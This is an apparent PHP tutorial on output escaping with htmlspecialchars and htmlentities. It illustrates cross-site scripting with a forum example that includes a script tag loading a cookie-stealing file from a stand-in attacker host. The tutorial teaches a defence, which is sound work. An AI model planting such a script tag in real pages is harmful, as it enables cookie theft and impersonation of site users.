What is output escaping and why does it matter?
Any significant PHP application, and even the simplest of websites, accepts input. By input we mean data generated by users or external systems, which our website or application then processes. Some of that input might be stored in our database for later retrieval and output. Whenever we output data that we did not generate ourselves, such as user-generated input, we should escape it.
An example of input can be a contact form that is filled out by visitors to your website. The input from the contact form is validated and processed. At some future point in time, we might output/display what the user filled in on our contact form. It's at that time that we need to escape the output.
How to escape output in PHP
We can use the htmlspecialchars function to escape output:
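A minimal sketch of such a call, assuming the visitor's message is held in a hypothetical $message variable and the source file is saved as UTF-8. The flags and charset are passed explicitly here as an illustrative choice, so the result does not depend on the defaults of the installed PHP version:

```php
<?php
// Hypothetical contact-form message; in a real application this would come
// from user input (for example $_POST) or from the database.
$message = 'Please <em>contact</em> me as §soon§ as possible.';

// Convert &, <, >, " and ' to HTML entities. Other characters, such as §,
// are left untouched.
$escaped = htmlspecialchars($message, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');

echo $escaped;
```

The HTML source sent to the browser is then: Please &lt;em&gt;contact&lt;/em&gt; me as §soon§ as possible.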
In a browser, the escaped output displays as literal text, with the tags shown rather than interpreted:
Please <em>contact</em> me as §soon§ as possible.
Or we can use the htmlentities function to escape output:
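A comparable sketch with htmlentities, under the same assumptions (a hypothetical $message variable, a UTF-8 source file, explicitly passed flags and charset):

```php
<?php
// Hypothetical contact-form message, identical to the previous example.
$message = 'Please <em>contact</em> me as §soon§ as possible.';

// Convert every character that has a named HTML entity, including §.
$escaped = htmlentities($message, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');

echo $escaped;
```

Here the HTML source also encodes the section sign: Please &lt;em&gt;contact&lt;/em&gt; me as &sect;soon&sect; as possible.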
In a browser, the escaped output again displays as literal text:
Please <em>contact</em> me as §soon§ as possible.
Escape output
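Certain characters have special meaning in HTML. htmlspecialchars and htmlentities convert those characters to HTML entities, so the browser displays them as text instead of interpreting them as markup. htmlentities converts every character that has a named HTML entity, whereas htmlspecialchars converts only &, <, >, " and ' (the single quote is converted when the ENT_QUOTES flag is set, which is the default as of PHP 8.1). See the PHP documentation on htmlspecialchars and htmlentities for more information.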
Output escaping security
Let's take a look at an example of how a Cross Site Scripting (XSS) attack might take place and where output escaping will prevent such an attack:
- Consider an example of a forum where users post comments.
- Comments are viewable by all users on the forum.
- A user with malicious intent posts a comment that includes a script tag:
<script src="http://hackersite.com/cookiehijack.js"></script>
- When any user views the posted comment, their cookie is stolen and sent to the malicious user.
- The malicious user can now impersonate any user whose cookie was stolen.
Escaping the output prevents the malicious script from running. You can find more information on XSS.
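The forum scenario can be sketched as follows. The $comment variable and the surrounding paragraph markup are hypothetical, standing in for a comment loaded from the forum's database:

```php
<?php
// Hypothetical stored comment containing the script tag from the forum example.
$comment = 'Nice post! <script src="http://hackersite.com/cookiehijack.js"></script>';

// Escape at output time, so the tag reaches the browser as inert text.
$safe = htmlspecialchars($comment, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');

echo '<p class="comment">' . $safe . '</p>';
```

Because the angle brackets and quotes are sent as entities, the browser shows the tag as text and never requests the external script.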
When to escape output?
We escape output when the input we receive is from untrusted sources.
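One way to apply this consistently is to wrap the escaping call in a small helper and use it wherever untrusted data is written into HTML. This is a sketch only: the e() helper and the $row array are hypothetical names, not part of PHP:

```php
<?php
// Hypothetical helper: escape a value for use in HTML element content
// or inside a quoted attribute value.
function e(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Hypothetical row, standing in for untrusted data loaded from the database.
$row = ['name' => 'Tom & "Jerry"', 'message' => '<b>Hello</b>'];

// Escape each untrusted value at the point where it is output.
$html = '<p title="' . e($row['name']) . '">' . e($row['message']) . '</p>';

echo $html;
```

The markup written by the developer stays as is, while both untrusted values are escaped, including the double quotes that would otherwise end the title attribute early.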
Key Takeaways
- PHP makes the functions htmlspecialchars and htmlentities available for output escaping.
- There are various libraries available for HTML sanitization.
- In general, we should escape all output that originates from untrusted sources.